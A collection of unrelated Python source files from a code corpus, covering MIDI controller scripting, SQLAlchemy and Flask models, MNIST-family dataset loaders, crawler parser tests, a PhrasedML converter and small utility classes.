"""When the internal MIDI controller has changed in a way that you need to rebuild
the MIDI mappings, request a rebuild by calling this function
This is processed as a request, to be sure that its not too often called, because
its time-critical.
"""
self.__c_instance.request_rebuild_midi_map()
def send_midi(self, midi_event_bytes):
"""Use this function to send MIDI events through Live to the _real_ MIDI devices
that this script is assigned to.
"""
if not self.__automap_has_control:
self.__c_instance.send_midi(midi_event_bytes)
def refresh_state(self):
"""Send out MIDI to completely update the attached MIDI controller.
Will be called when requested by the user, after for example having reconnected
the MIDI cables...
"""
self.__update_hardware_delay = 5
def __update_hardware(self):
self.__automap_has_control = False
self.send_midi(WELCOME_SYSEX_MESSAGE)
for c in self.__components:
c.refresh_state()
def build_midi_map(self, midi_map_handle):
"""Build DeviceParameter Mappings, that are processed in Audio time, or
forward MIDI messages explicitly to our receive_midi_functions.
Which means that when you are not forwarding MIDI, nor mapping parameters, you will
never get any MIDI messages at all.
"""
if not self.__automap_has_control:
for c in self.__components:
c.build_midi_map(self.__c_instance.handle(), midi_map_handle)
self.__c_instance.set_pad_translation(PAD_TRANSLATION)
def update_display(self):
"""Aka on_timer. Called every 100 ms and should be used to update display relevant
parts of the controller only...
"""
if self.__update_hardware_delay > 0:
self.__update_hardware_delay -= 1
if self.__update_hardware_delay == 0:
self.__update_hardware()
self.__update_hardware_delay = -1
for c in self.__components:
c.update_display()
def receive_midi(self, midi_bytes):
"""MIDI messages are only received through this function, when explicitly
forwarded in 'build_midi_map'.
"""
self.__c_instance.log_message("received midi: " + str(midi_bytes))
if midi_bytes[0] & 240 in (NOTE_ON_STATUS, NOTE_OFF_STATUS):
channel = midi_bytes[0] & 15
note = midi_bytes[1]
velocity = midi_bytes[2]
if note in fx_notes:
self.__mixer_controller.receive_midi_note(note, velocity, midi_bytes[0] & 240)
elif midi_bytes[0] & 240 == CC_STATUS:
channel = midi_bytes[0] & 15
cc_no = midi_bytes[1]
cc_value = midi_bytes[2]
if cc_no in mx_ccs or cc_no in fx_ccs:
self.__mixer_controller.receive_midi_cc(cc_no, cc_value)
else:
                print('err2: unknown MIDI message %s' % str(midi_bytes))
elif midi_bytes[0] == 240:
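            # Sysex (0xF0): bytes 1-3 carry the manufacturer ID; (0, 32, 41) is Novation's ID (00 20 29)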
if len(midi_bytes) == 13 and midi_bytes[1:4] == (0, 32, 41):
if midi_bytes[8] == ABLETON_PID and midi_bytes[10] == 1:
if not self.__automap_has_control:
self.send_midi(ALL_LEDS_OFF_MESSAGE)
for c in self.__components:
if not self.__automap_has_control:
c.refresh_state()
self.request_rebuild_midi_map()
else:
                print('err3: unknown MIDI message %s' % str(midi_bytes))
|
StarcoderdataPython
|
5048414
|
from sqlalchemy import *
from sqlalchemy.orm import validates, relationship
from db import db
class DeploymentTarget(db.Model):
__tablename__ = "deployment_target"
id = Column(String, primary_key=True)
deployment_target_type_id = Column(String, ForeignKey('deployment_target_type.id'))
partition_id = Column(String, ForeignKey('partition.id'))
name = Column(String(255), nullable=False)
defaults = Column(Text)
native_id = Column(String)
partition = relationship("Partition", back_populates="deployment_targets")
fleets = relationship("Fleet", back_populates="deployment_target")
type = relationship("DeploymentTargetType", back_populates="targets")
deployments = relationship('Deployment', back_populates='deployment_target')
def __repr__(self):
return self.id
@validates('id')
def validate_name(self, key, value):
assert value != ''
return value
@db.event.listens_for(DeploymentTarget, 'before_update')
@db.event.listens_for(DeploymentTarget, 'before_insert')
def my_before_insert_listener(mapper, connection, target):
__update_id__(target)
def __update_id__(target):
target.id = target.partition_id + ':' + target.deployment_target_type_id + ':' + target.name
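# Usage sketch (illustrative only; assumes a configured Flask-SQLAlchemy
# session, which this module does not set up):
#
#     target = DeploymentTarget(partition_id="p1",
#                               deployment_target_type_id="k8s",
#                               name="prod-east")
#     db.session.add(target)
#     db.session.commit()
#     # the before_insert listener composes the key:
#     assert target.id == "p1:k8s:prod-east"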
|
StarcoderdataPython
|
3281872
|
class Individual:
"""Represents an image"""
def __init__(self, **kwargs):
self.genome = kwargs['genome'] # List of genes
self.fitness = 0 # Fitness value for this individual
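# Minimal usage sketch (the genome encoding and fitness evaluation below are
# hypothetical; nothing in this module defines them):
#
#     ind = Individual(genome=[0.2, 0.7, 0.1])
#     ind.fitness = sum(ind.genome)  # stand-in for a real evaluation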
|
StarcoderdataPython
|
1623644
|
<gh_stars>1-10
from bs4 import BeautifulSoup, element
import re
from matplotlib.cm import ScalarMappable, RdYlGn
from core import *
from selectors import *
from actors import *
from evaluators import *
from autocues import *
# Triggers:
policy = ScoringPolicy()
policy.append((ScoreAggregator(), EVAL_CONTAINER))
policy.append((RegExCounter(",", 1), EVAL_PARAGRAPH))
policy.append((Limiter(RegExCounter("(\w)+(['`]\w)?", 1), 20), EVAL_PARAGRAPH))
policy.append((CSSSelector("a", Scorer(FixedValue(-50))), PRE_TRAVERSAL))
policy.append((ScoreSelector(Pruner()), POST_TRAVERSAL))
#policy['parent'] = (ParentScorer(), EVAL_CONTAINER) # aggregates scores from children
#policy['commas'] = (RegExCountScorer(",", 1), EVAL_PARAGRAPH)
#policy['words'] = (RegExCountScorer("(\w)+(['`]\w)?", 1), EVAL_PARAGRAPH)
#policy['children'] = (CountChildrenScorer("p", 10), EVAL_CONTAINER)
#policy['paragraph'] = (FixedValueScorer(1), EVAL_PARAGRAPH)
#policy['container'] = (FixedValueScorer(1), EVAL_CONTAINER)
if __name__ == '__main__':
html_doc = """ <html><head><title>The Dormouse's story</title></head><body><div><p class="title"><b>The Dormouse's story</b></p> <p class="story">Once upon a time there were three little sisters; and their names were <a href="http://example.com/elsie" class="sister" id="link1">Elsie</a>, <a href="http://example.com/lacie" class="sister" id="link2">Lacie</a> and <a href="http://example.com/tillie" class="sister" id="link3">Tillie</a>; and they lived at the bottom of a well.</p> <p class="story">...</p></div></body></html>"""
    soup = BeautifulSoup(html_doc, "html.parser")
for tag in reversed(soup.find_all(["p","a","b"])):
policy.execute(tag, EVAL_PARAGRAPH)
policy.execute(soup, PRE_TRAVERSAL)
policy.execute(soup.find("body"), EVAL_CONTAINER)
for tag in soup.find_all():
        print("%s = %s" % (tag.name, tag.scores))
container = get_tag_with_max_score(soup)
style_all_tags(soup, container)
html_styled = soup.find("body").prettify(formatter="html")
policy.execute(container, POST_TRAVERSAL)
    print(container.get_text())
|
StarcoderdataPython
|
4840893
|
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 01 16:19:44 2015
@author: <NAME>
"""
import os.path
import sys, StringIO
import antimony
import roadrunner
import tellurium as te
import zipfile
import tempfile
import re
try:
import phrasedml
except ImportError as e:
roadrunner.Logger.log(roadrunner.Logger.LOG_WARNING, str(e))
try:
import tecombine as combine
except ImportError as e:
roadrunner.Logger.log(roadrunner.Logger.LOG_WARNING, str(e))
class tePhrasedml(object):
def __init__(self, antimonyStr, phrasedmlStr):
modelispath = False
if type(antimonyStr) != str:
raise Exception("Invalid Antimony string/model path")
else:
if os.path.exists(antimonyStr): #incomplete - load model path directly.
modelispath = True
else:
pass
if type(phrasedmlStr) != str:
raise Exception("Invalid PhrasedML string")
        self.modelispath = modelispath
        self.antimonyStr = antimonyStr
        self.phrasedmlStr = phrasedmlStr
def execute(self):
outputstr = self.createpython()
try:
exec(outputstr)
except Exception as e:
raise e
def createpython(self): # Create and return Python script given antimony and phrasedml strings
rePath = r"(\w*).load\('(.*)'\)"
reLoad = r"(\w*) = roadrunner.RoadRunner\(\)"
reModel = r"""(\w*) = model ('|")(.*)('|")"""
phrasedmllines = self.phrasedmlStr.splitlines()
for i,s in enumerate(phrasedmllines):
reSearchModel = re.split(reModel, s)
if len(reSearchModel) > 1:
modelsource = str(reSearchModel[3])
modelname = os.path.basename(modelsource)
modelname = str(modelname).replace(".xml", '')
phrasedml.setReferencedSBML(modelsource, te.antimonyTosbml(self.antimonyStr))
sedmlstr = phrasedml.convertString(self.phrasedmlStr)
        if sedmlstr is None:
raise Exception(phrasedml.getLastError())
phrasedml.clearReferencedSBML()
fd1, sedmlfilepath = tempfile.mkstemp()
os.write(fd1, sedmlstr)
pysedml = te.SedmlToRr.sedml_to_python(sedmlfilepath)
        if not self.modelispath:
lines = pysedml.splitlines()
for i,s in enumerate(lines):
reSearchPath = re.split(rePath, s)
if len(reSearchPath) > 1:
del lines[i]
for i,s in enumerate(lines):
reSearchLoad = re.split(reLoad, s)
if len(reSearchLoad) > 1:
s = s.replace("roadrunner.RoadRunner()", "te.loada(" + str(modelname)+ ")")
lines[i] = s
if not "import tellurium" in pysedml:
if "import roadrunner" in pysedml:
for i,s in enumerate(lines):
if "import roadrunner" in s:
del lines[i]
lines.insert(i, "import tellurium as te")
else:
pass
pysedml = '\n'.join(lines)
# List of replacements
pysedml = pysedml.replace('"compartment"', '"compartment_"')
pysedml = pysedml.replace("'compartment'", "'compartment_'")
outputstr = str(modelname) + " = '''" + self.antimonyStr + "'''\n\n" + pysedml
os.close(fd1)
os.remove(sedmlfilepath)
return outputstr
def printpython(self):
outputstr = self.createpython()
        print(outputstr)
def exportAsCombine(self, outputpath): # parameter outputpath must be a full path of a zip file you wish to create
# Temporary failsafe - Should be revised once libphrasedml adopts returning of model name
reModel = r"""(\w*) = model ('|")(.*)('|")"""
#rePlot = r"""plot ('|")(.*)('|") (.*)"""
lines = self.phrasedmlStr.splitlines()
for i,s in enumerate(lines):
reSearchModel = re.split(reModel, s)
#reSearchPlot = re.split(rePlot, s)
if len(reSearchModel) > 1:
modelsource = str(reSearchModel[3])
modelname = os.path.basename(modelsource)
if ".xml" or ".sbml" not in modelsource:
modelname = modelname + ".xml"
s = s.replace(modelsource, modelname)
lines[i] = s
#if len(reSearchPlot) > 1:
# plottitle = str(reSearchPlot[2])
revphrasedml = '\n'.join(lines)
phrasedml.setReferencedSBML(modelname, te.antimonyTosbml(self.antimonyStr))
combine.export(outputpath, self.antimonyStr, modelname, revphrasedml)
phrasedml.clearReferencedSBML()
def getAntimonyString(self):
return self.antimonyStr
def getSbmlString(self):
return te.antimonyTosbml(self.antimonyStr)
def getPhrasedmlString(self):
return self.phrasedmlStr
def getSedmlString(self):
reModel = r"""(\w*) = model ('|")(.*)('|")"""
phrasedmllines = self.phrasedmlStr.splitlines()
for i,s in enumerate(phrasedmllines):
reSearchModel = re.split(reModel, s)
if len(reSearchModel) > 1:
modelsource = str(reSearchModel[3])
                phrasedml.setReferencedSBML(modelsource, te.antimonyTosbml(self.antimonyStr))
sedmlstr = phrasedml.convertString(self.phrasedmlStr)
        if sedmlstr is None:
raise Exception(phrasedml.getLastError())
phrasedml.clearReferencedSBML()
return sedmlstr
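# Usage sketch (illustrative; `antimony_str` and `phrasedml_str` are assumed
# to hold a valid Antimony model and a PhrasedML experiment referencing it):
#
#     exp = tePhrasedml(antimony_str, phrasedml_str)
#     exp.printpython()                          # inspect the generated code
#     exp.execute()                              # run the simulation
#     exp.exportAsCombine("/tmp/experiment.zip") # archive model + experiment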
|
StarcoderdataPython
|
229130
|
import re
from sublime import Region
class SImport:
@staticmethod
def getExpressionInContext(expression, context):
match = re.search(r"[^\{{\}}\(\)\<\>\.;\s]*{0}$".format(expression), context)
if match:
return match.group(0)
return expression
def __init__(self, expression, context, region, context_region):
self.expression = self.getExpressionInContext(expression, context)
self.region = Region(region.end() - len(self.expression), region.end())
self.context = context
self.context_region = context_region
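# Example of the context-aware expansion (only the static helper is shown,
# since the constructor needs Sublime's Region type):
#
#     SImport.getExpressionInContext("Route", "foo.BarRoute")  # -> "BarRoute"
#     SImport.getExpressionInContext("Route", "new Route")     # -> "Route"
#
# Delimiters such as '.', ';', braces and whitespace bound the match, so only
# the contiguous identifier ending in the expression is returned.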
|
StarcoderdataPython
|
9685931
|
# ------------------------------------------------------------------------------
# Class TextInput
#
# Allows the user to input text (as opposed to predefined options)
# ------------------------------------------------------------------------------
from PythonUtils.user_input import UserInput
from PythonUtils.option import Option
import re
class TextInput(UserInput):
def __init__(self, text, default=None, regex=None):
UserInput.__init__(self, text, default)
if regex:
self.regex = re.compile(regex)
self.help_string = "Input must conform to regex " + regex
else:
self.regex = None
self.help_string = "No input check is made, any is valid"
if default:
self.help_string += "\nThe default value is: " + str(default)
def _help_action(self):
return self.help_string
def get_answer(self):
return self.answer
def _ask(self):
if self.default is None:
user_input = input(self.text + "\n")
else:
user_input = input(self.text + " (default: " + self.default + ")\n")
return_value = self.NOT_SET
for option in self.master_options:
if option == user_input:
return_value = option.return_value
option.run()
if return_value == self.NOT_SET:
if user_input == "":
self.answer = self.default
return_value = self.SUCCESS
else:
if self.regex:
if self.regex.fullmatch(user_input):
return_value = self.SUCCESS
self.answer = user_input
else:
return_value = self.INVALID_INPUT
print(self.help_string)
else:
return_value = self.SUCCESS
self.answer = user_input
return return_value
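# Usage sketch (interactive, shown for illustration; the public entry point
# is assumed to live in PythonUtils.user_input, which is not shown here):
#
#     question = TextInput("Port to listen on?", default="8080",
#                          regex=r"\d{1,5}")
#     if question._ask() == question.SUCCESS:
#         port = question.get_answer()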
|
StarcoderdataPython
|
11353339
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-05-09 11:48
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('mapdata', '0065_auto_20170509_1140'),
]
operations = [
migrations.AlterModelOptions(
name='space',
options={'verbose_name': 'Space', 'verbose_name_plural': 'Spaces'},
),
migrations.AddField(
model_name='door',
name='level',
field=models.CharField(choices=[('', 'normal'), ('upper', 'upper'), ('lower', 'lower')], default='', max_length=16, verbose_name='level'),
),
migrations.AlterField(
model_name='space',
name='section',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='spaces', to='mapdata.Section', verbose_name='section'),
),
]
|
StarcoderdataPython
|
4891466
|
from deliravision.data.base_datasets import ImageFolder, Downloadable
import codecs
import gzip
import os
import numpy as np
from PIL import Image
import zipfile
class MNIST(ImageFolder, Downloadable):
"""
The MNIST Dataset
See Also
--------
:class:`deliravision.data.base_datasets.ImageFolder`
the Image Folder, this class is implemented upon.
:class:`deliravision.mnist.KMNIST`
the Kuzushiji-MNIST dataset
:class:`deliravision.mnist.EMNIST`
the extended MNIST dataset
:class:`deliravision.mnist.FashionMNIST`
the FashionMNIST dataset
References
----------
http://yann.lecun.com/exdb/mnist/
"""
def __init__(self, root="/tmp", train=True, download=True, remove=False):
"""
Parameters
----------
root : str
the path, all data should be placed in;
will be created if not yet existing
train : bool
whether to load the trainset or the testset
download : bool
            whether to download the dataset; this will only be done if it
            wasn't downloaded already
        remove : bool
            whether to remove the downloaded data after processing it
"""
root = os.path.join(root, self.name)
if train:
root = os.path.join(root, "train")
else:
root = os.path.join(root, "val")
self.train = train
Downloadable.__init__(self, path=root, download=download,
remove=remove)
ImageFolder.__init__(self, path=os.path.join(root, "processed"))
def preprocess_data(self, download_path, prep_path):
"""
Function to preprocess the downloaded data
Parameters
----------
download_path : str
the path containing the downloaded data
prep_path : str
the path the preprocessed data should be stored in
"""
images = None
labels = None
# unzip files
        for fname in self.urls.values():
            # filenames look like "train-images-idx3-ubyte.gz", so the second
            # dash-separated field tells images and labels apart
            img_label = fname.split("-")[1]
            if img_label == "images":
                images = self._read_images_from_binary_gzip(
                    os.path.join(download_path, fname))
            else:
                labels = self._read_labels_from_binary_gzip(
                    os.path.join(download_path, fname))
# check if images and labels have been loaded
assert images is not None and labels is not None
self._to_image_folder(images, labels, prep_path)
def _to_image_folder(self, images, labels, prep_path):
"""
Helper Function, which writes the given images and labels to the given
path in a way, they can be read by the
:class:`deliravision.data.base_datasets.ImageFolder` class
Parameters
----------
images : :class:`numpy.ndarray`
the array containing the images
labels : :class:`numpy.ndarray`
the array containing the labels
prep_path : str
the path which will contain the preprocessed data after
dumping the images
"""
# counter for each class
label_idxs = {}
for img, label in zip(images, labels):
label = int(label)
label = self.class_names[label]
# set counter for class to zero and create dir for class if first
# item of this class
if label not in label_idxs:
label_idxs[label] = 0
os.makedirs(os.path.join(prep_path, label))
# write image to disk and increase counter
Image.fromarray(img).save(os.path.join(prep_path, label, "%05d.png"
% label_idxs[label]))
label_idxs[label] += 1
@staticmethod
def _get_int_from_hex(b):
"""
Helper function to decode an integer from a binary hexfile
Parameters
----------
b :
binary buffer
Returns
-------
int
integer value decoded from given buffer
"""
return int(codecs.encode(b, 'hex'), 16)
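    # For example (illustrative): the magic number of an MNIST image file is
    # stored big-endian as b'\x00\x00\x08\x03', and
    # _get_int_from_hex(b'\x00\x00\x08\x03') == 0x803 == 2051.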
def _read_images_from_binary_gzip(self, path):
"""
Reads images from a binary gzip data file
Parameters
----------
path : str
path to that datafile
Returns
-------
:class:`numpy.ndarray`
the loaded images
"""
# open file and read data
with gzip.open(path, "rb") as f:
data = f.read()
assert self._get_int_from_hex(data[:4]) == 2051
# get number of items, rows and columns
length = self._get_int_from_hex(data[4:8])
num_rows = self._get_int_from_hex(data[8:12])
num_cols = self._get_int_from_hex(data[12:16])
# load from buffer with numpy
parsed = np.frombuffer(data, dtype=np.uint8, offset=16)
        return parsed.reshape(length, num_rows, num_cols)
def _read_labels_from_binary_gzip(self, path):
"""
Reads labels from a binary gzip data file
Parameters
----------
path : str
path to that datafile
Returns
-------
:class:`numpy.ndarray`
the loaded labels
"""
# open file and read data
with gzip.open(path, 'rb') as f:
data = f.read()
assert self._get_int_from_hex(data[:4]) == 2049
# get number of items
length = self._get_int_from_hex(data[4:8])
# read from buffer with numpy
parsed = np.frombuffer(data, dtype=np.uint8, offset=8)
        return parsed.reshape(length)
@property
def urls(self):
"""
Property returning the urls of the current mode
Returns
-------
dict
dictionary containing either the train or test urls
"""
if self.train:
return {
"http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz":
"train-images-idx3-ubyte.gz",
"http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz":
"train-labels-idx1-ubyte.gz"
}
return {
"http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz":
"t10k-images-idx3-ubyte.gz",
"http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz":
"t10k-labels-idx1-ubyte.gz"
}
@property
def name(self):
"""
Property returning the Datasets name to make the class reusable
Returns
-------
str
the name
"""
return "MNIST"
@property
def class_names(self):
return ("zero", "one", "two", "three", "four", "five", "six", "seven",
"eight", "nine")
class FashionMNIST(MNIST):
"""
The Fashion-MNIST Dataset
See Also
--------
:class:`deliravision.data.base_datasets.ImageFolder`
the Image Folder, this class is implemented upon.
:class:`deliravision.data.mnist.MNIST`
the original MNIST dataset
:class:`deliravision.mnist.KMNIST`
the Kuzushiji-MNIST dataset
:class:`deliravision.mnist.EMNIST`
the extended MNIST dataset
References
----------
https://github.com/zalandoresearch/fashion-mnist
"""
@property
def name(self):
"""
Property returning the Datasets name
Returns
-------
str
the name
"""
return "FashionMNIST"
@property
def urls(self):
"""
Property returning the urls of the current mode
Returns
-------
dict
dictionary containing either the train or test urls
"""
if self.train:
return {
"http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/"
"train-images-idx3-ubyte.gz":
"train-images-idx3-ubyte.gz",
"http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/"
"train-labels-idx1-ubyte.gz":
"train-labels-idx1-ubyte.gz"
}
return {
"http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/"
"t10k-images-idx3-ubyte.gz":
"t10k-images-idx3-ubyte.gz",
"http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/"
"t10k-labels-idx1-ubyte.gz":
"t10k-labels-idx1-ubyte.gz"
}
@property
def class_names(self):
return ("tshirt", "trouser", "pullover", "dress", "coat", "sandal",
"shirt", "sneaker", "bag", "ankle_boot")
class KMNIST(MNIST):
"""
The Kuzushiji-MNIST Dataset
See Also
--------
:class:`deliravision.data.base_datasets.ImageFolder`
the Image Folder, this class is implemented upon.
:class:`deliravision.data.mnist.MNIST`
the original MNIST dataset
:class:`deliravision.mnist.FashionMNIST`
the FashionMNIST dataset
:class:`deliravision.mnist.EMNIST`
the extended MNIST dataset
References
----------
https://github.com/rois-codh/kmnist
"""
@property
def name(self):
"""
Property returning the Datasets name
Returns
-------
str
the name
"""
return "KMNIST"
@property
def urls(self):
"""
Property returning the urls of the current mode
Returns
-------
dict
dictionary containing either the train or test urls
"""
if self.train:
return {
"http://codh.rois.ac.jp/kmnist/dataset/kmnist/"
"train-images-idx3-ubyte.gz":
"train-images-idx3-ubyte.gz",
"http://codh.rois.ac.jp/kmnist/dataset/kmnist/"
"train-labels-idx1-ubyte.gz":
"train-labels-idx1-ubyte.gz"
}
return {
"http://codh.rois.ac.jp/kmnist/dataset/kmnist/"
"t10k-images-idx3-ubyte.gz":
"t10k-images-idx3-ubyte.gz",
"http://codh.rois.ac.jp/kmnist/dataset/kmnist/"
"t10k-labels-idx1-ubyte.gz":
"t10k-labels-idx1-ubyte.gz"
}
@property
def class_names(self):
return tuple(str(i) for i in range(10))
class EMNIST(MNIST):
"""
The Extended-MNIST Dataset
See Also
--------
:class:`deliravision.data.base_datasets.ImageFolder`
the Image Folder, this class is implemented upon.
:class:`deliravision.data.mnist.MNIST`
the original MNIST dataset
:class:`deliravision.mnist.FashionMNIST`
the FashionMNIST dataset
:class:`deliravision.mnist.KMNIST`
the Kuzushiji-MNIST dataset
References
----------
https://www.westernsydney.edu.au/bens/home/reproducible_research/emnist
"""
def __init__(self, root="/tmp", train=True, split="balanced",
download=True, remove=False):
assert split in ('balanced', 'byclass', 'bymerge', 'digits', 'letters',
'mnist')
self.split = split
self.train = train
root = os.path.join(root, self.name)
Downloadable.__init__(self, path=root, download=download,
remove=remove)
ImageFolder.__init__(
self, os.path.join(root, split, "train" if train else "test"))
@property
def name(self):
"""
Property returning the Datasets name
Returns
-------
str
the name
"""
return "EMNIST"
@property
def urls(self):
"""
Property returning the urls of the current mode
Returns
-------
dict
dictionary containing either the train or test urls
"""
return {"https://cloudstor.aarnet.edu.au/plus/index.php/s/"
"54h3OuGJhFLwAlQ/download": "emnist_full.zip"}
def preprocess_data(self, download_path, prep_path):
"""
Function to preprocess the downloaded data
Parameters
----------
download_path : str
the path containing the downloaded data
prep_path : str
the path the preprocessed data should be stored in
"""
fname = list(self.urls.values())[0]
with zipfile.ZipFile(os.path.join(download_path, fname)) as f:
f.extractall(download_path)
download_path = os.path.join(download_path, "gzip")
split_files = {k: os.path.join(download_path, v)
for k, v in self._split_files.items()}
images = self._read_images_from_binary_gzip(split_files["images"])
labels = self._read_labels_from_binary_gzip(split_files["labels"])
train_str = "train" if self.train else "test"
self._to_image_folder(images, labels, os.path.join(prep_path,
self.split,
train_str))
@property
def _split_files(self):
"""
Property returning the files in the archive for the current split and
train mode
Returns
-------
dict
dictionary containing the filenames for the images and labels file
"""
train_str = "train" if self.train else "test"
return {"images": "emnist-%s-%s_images-idx3-ubtyte.gz"
% (self.split, train_str),
"labels": "emnist-%s-%s-labels-idx1-ubyte.gz"
% (self.split, train_str)}
@property
def class_names(self):
uppercase = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K",
"L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V",
"W", "X", "Y", "Z"]
digits = [str(i) for i in range(10)]
        lowercase = [i.lower() for i in uppercase]
merged = (digits + uppercase + ["a", "b", "d", "e", "f", "g",
"h", "n", "q", "r", "t"])
cls_names = {
"mnist": digits,
"balanced": merged,
"bymerge": merged,
"byclass": digits + uppercase + lowercase,
"digits": digits,
"letters": uppercase
}
return cls_names[self.split]
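# Usage sketch (illustrative; the first call downloads the archives from the
# URLs above and unpacks them into an image-folder layout):
#
#     if __name__ == "__main__":
#         trainset = MNIST(root="/tmp/datasets", train=True, download=True)
#         print(trainset.class_names)   # ("zero", "one", ..., "nine")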
|
StarcoderdataPython
|
1914107
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Vincent<<EMAIL>>
# http://blog.vincentzhong.cn
# Created on 2017/2/26 19:57
# !/usr/bin/env python
import asynctest
from catty.message_queue import AsyncRedisPriorityQueue
from catty.parser import Parser
from catty import DOWNLOADER_PARSER, PARSER_SCHEDULER
import catty.config
import asyncio
class TestParser(asynctest.TestCase):
use_default_loop = True
@classmethod
def setUpClass(cls):
from catty.libs.tasker import Tasker
from tests.spider.mock_spider import Spider
cls.downloader_parser_queue = AsyncRedisPriorityQueue('MySpider:DP', loop=cls.loop)
cls.parser_scheduler_queue = AsyncRedisPriorityQueue('MySpider:PS', loop=cls.loop)
cls.parser = Parser(
cls.downloader_parser_queue,
cls.parser_scheduler_queue,
cls.loop
)
myspider = Spider()
tasker = Tasker()
cls.parser.spider_started.add(myspider.name)
cls.task = tasker.make_task(myspider.start())
cls.mock_response_task = tasker.make_task(myspider.start())
cls.mock_response_task['response'] = {'body': 'this is a mock response', 'status': 200}
async def setUp(self):
self.parser.loop = self.loop
await self.downloader_parser_queue.conn()
await self.parser_scheduler_queue.conn()
async def tearDown(self):
pass
async def test_run_ins_func(self):
await self.parser._run_ins_func('mock_spider', 'mock_parser_with_response', self.mock_response_task)
t1 = await self.parser.parser_scheduler_queue.get()
self.assertAlmostEqual(self.mock_response_task, t1)
async def test_make_tasks_return_dict(self):
await self.downloader_parser_queue.put(self.mock_response_task)
# -----------------test-------------------
await self.parser.make_tasks()
        await asyncio.sleep(0.5, loop=self.loop)
t1 = await self.parser.parser_scheduler_queue.get()
self.assertAlmostEqual(self.mock_response_task, t1)
async def test_dump_load_tasks(self):
import os
await self.downloader_parser_queue.put(self.mock_response_task)
await self.parser_scheduler_queue.put(self.mock_response_task)
await self.parser.dump_tasks(DOWNLOADER_PARSER)
await self.parser.dump_tasks(PARSER_SCHEDULER)
await asyncio.sleep(0.5, loop=self.loop)
self.assertTrue(os.path.exists(os.path.join(
os.path.join(catty.config.PERSISTENCE['DUMP_PATH'], '{}_{}'.format(self.parser.name, DOWNLOADER_PARSER)),
self.mock_response_task['spider_name'])))
self.assertTrue(os.path.exists(os.path.join(
os.path.join(catty.config.PERSISTENCE['DUMP_PATH'], '{}_{}'.format(self.parser.name, PARSER_SCHEDULER)),
self.mock_response_task['spider_name'])))
await self.parser.load_tasks(DOWNLOADER_PARSER, self.mock_response_task['spider_name'])
await self.parser.load_tasks(PARSER_SCHEDULER, self.mock_response_task['spider_name'])
downloader_parser_task = await self.downloader_parser_queue.get()
parser_scheduler_task = await self.parser_scheduler_queue.get()
self.assertAlmostEqual(self.mock_response_task, downloader_parser_task)
self.assertAlmostEqual(self.mock_response_task, parser_scheduler_task)
if __name__ == '__main__':
pass
|
StarcoderdataPython
|
370935
|
<gh_stars>1-10
from sql_alchemy import db
from models.fornecedor_model import FornecedorModel
from models.categoria_model import CategoriaModel
class ProdutoModel(db.Model):
__tablename__ = 'produto'
id_produto = db.Column(db.Integer, primary_key=True)
cod_produto = db.Column(db.String(50), nullable=False)
nome_produto = db.Column(db.String(150), nullable=False)
valor_produto = db.Column(db.Float(precision=2), nullable=False)
ativo = db.Column(db.String(3), nullable=False)
cod_categoria = db.Column(
db.Integer, db.ForeignKey('categoria.cod_categoria'))
cod_fornecedor = db.Column(
db.Integer, db.ForeignKey('fornecedor.cod_fornecedor'))
def __init__(self, cod_produto, nome_produto,
valor_produto, ativo, cod_categoria, cod_fornecedor):
self.cod_produto = cod_produto
self.nome_produto = nome_produto
self.valor_produto = valor_produto
self.ativo = ativo
self.cod_categoria = cod_categoria
self.cod_fornecedor = cod_fornecedor
def getCodProduto(self):
return self.cod_produto
def json(self):
return {
'id_produto': self.id_produto,
'cod_produto': self.cod_produto,
'nome_produto': self.nome_produto,
'valor_produto': self.valor_produto,
'ativo': self.ativo,
'cod_categoria': self.cod_categoria,
'cod_fornecedor': self.cod_fornecedor
}
@classmethod
def find_produto_by_cod(cls, cod_produto):
produto = cls.query.filter_by(cod_produto=cod_produto).first()
if produto:
return produto
return None
@classmethod
def find_produto(cls, id_produto):
produto = cls.query.filter_by(id_produto=id_produto).first()
if produto:
return produto
return None
@classmethod
def find_produto_categoria(cls, cod_fornecedor):
produto = cls.query.filter_by(cod_fornecedor=cod_fornecedor).first()
if produto:
return produto
return None
@classmethod
def find_produto_fornecedor(cls, cod_categoria):
produto = cls.query.filter_by(cod_categoria=cod_categoria).first()
if produto:
return produto
return None
def save_produto(self):
db.session.add(self)
db.session.commit()
def update_produto(self, id_produto, cod_produto, nome_produto,
valor_produto, ativo, cod_categoria, cod_fornecedor):
self.id_produto = id_produto
self.cod_produto = cod_produto
self.nome_produto = nome_produto
self.valor_produto = valor_produto
self.ativo = ativo
self.cod_categoria = cod_categoria
self.cod_fornecedor = cod_fornecedor
def delete_produto(self):
db.session.delete(self)
db.session.commit()
def __json_categoria(self, cod_categoria):
categoria = CategoriaModel.find_categoria(cod_categoria)
return categoria.json()
def __json_fornecedor(self, cod_fornecedor):
fornecedor = FornecedorModel.find_fornecedor(cod_fornecedor)
return fornecedor.json()
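# Usage sketch (illustrative; assumes an application context and existing
# categoria/fornecedor rows with the referenced codes):
#
#     produto = ProdutoModel("P-001", "Teclado", 199.90, "sim", 1, 1)
#     produto.save_produto()
#     assert ProdutoModel.find_produto_by_cod("P-001") is not None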
|
StarcoderdataPython
|
3402770
|
import math
import logging
from ._instrument import *
from ._instrument import _usgn, _sgn
from . import _utils
log = logging.getLogger(__name__)
REG_SG_TrigDutyInternalCH0_L = 69
REG_SG_TrigDutyInternalCH0_H = 70
REG_SG_TrigDutyInternalCH1_L = 71
REG_SG_TrigDutyInternalCH1_H = 72
REG_SG_TrigPeriodInternalCH0_L = 73
REG_SG_TrigPeriodInternalCH0_H = 74
REG_SG_TrigPeriodInternalCH1_L = 75
REG_SG_TrigPeriodInternalCH1_H = 76
REG_SG_ADCThreshold = 77
REG_SG_DACThreshold = 78
